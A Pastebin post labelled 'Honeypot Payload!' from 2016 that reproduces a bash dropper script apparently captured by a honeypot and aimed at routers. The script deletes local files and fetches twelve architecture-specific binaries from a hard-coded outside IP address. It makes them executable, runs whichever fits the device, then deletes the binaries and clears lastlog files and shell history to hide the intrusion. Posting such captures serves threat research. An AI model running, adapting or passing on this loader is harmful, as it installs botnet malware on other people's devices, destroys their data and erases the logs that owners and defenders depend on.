Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-05-28 22:03

May 28th, 2016
196
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.25 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. # Delete any current files, because not all routers have much storage space
  4. rm -f *
  5.  
  6. # Wget/cURL our binaries
  7. wget -q http://63.141.244.90/1 || curl -s -O http://63.141.244.90/1 || busybox wget -q http://63.141.244.90/1 || busybox curl -s -O http://63.141.244.90/1
  8. wget -q http://63.141.244.90/2 || curl -s -O http://63.141.244.90/2 || busybox wget -q http://63.141.244.90/2 || busybox curl -s -O http://63.141.244.90/2
  9. wget -q http://63.141.244.90/3 || curl -s -O http://63.141.244.90/3 || busybox wget -q http://63.141.244.90/3 || busybox curl -s -O http://63.141.244.90/3
  10. wget -q http://63.141.244.90/4 || curl -s -O http://63.141.244.90/4 || busybox wget -q http://63.141.244.90/4 || busybox curl -s -O http://63.141.244.90/4
  11. wget -q http://63.141.244.90/5 || curl -s -O http://63.141.244.90/5 || busybox wget -q http://63.141.244.90/5 || busybox curl -s -O http://63.141.244.90/5
  12. wget -q http://63.141.244.90/6 || curl -s -O http://63.141.244.90/6 || busybox wget -q http://63.141.244.90/6 || busybox curl -s -O http://63.141.244.90/6
  13. wget -q http://63.141.244.90/7 || curl -s -O http://63.141.244.90/7 || busybox wget -q http://63.141.244.90/7 || busybox curl -s -O http://63.141.244.90/7
  14. wget -q http://63.141.244.90/8 || curl -s -O http://63.141.244.90/8 || busybox wget -q http://63.141.244.90/8 || busybox curl -s -O http://63.141.244.90/8
  15. wget -q http://63.141.244.90/9 || curl -s -O http://63.141.244.90/9 || busybox wget -q http://63.141.244.90/9 || busybox curl -s -O http://63.141.244.90/9
  16. wget -q http://63.141.244.90/10 || curl -s -O http://63.141.244.90/10 || busybox wget -q http://63.141.244.90/10 || busybox curl -s -O http://63.141.244.90/10
  17. wget -q http://63.141.244.90/11 || curl -s -O http://63.141.244.90/11 || busybox wget -q http://63.141.244.90/11 || busybox curl -s -O http://63.141.244.90/11
  18. wget -q http://63.141.244.90/12 || curl -s -O http://63.141.244.90/12 || busybox wget -q http://63.141.244.90/12 || busybox curl -s -O http://63.141.244.90/12
  19.  
  20. # Set file permissions
  21. chmod 777 *
  22.  
  23. # Run correct binary for current architecture
  24. ./1 || ./2 || ./3 || ./4 || ./5 || ./6 || ./7 || ./8 || ./9 || ./10 || ./11 || ./12
  25.  
  26. # Delete our files
  27. rm -f *
  28.  
  29. # Clear up
  30. >/var/log/lastlog
  31. >/etc/lastlog
  32. rm -f ~/.bash_history
  33. history -c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement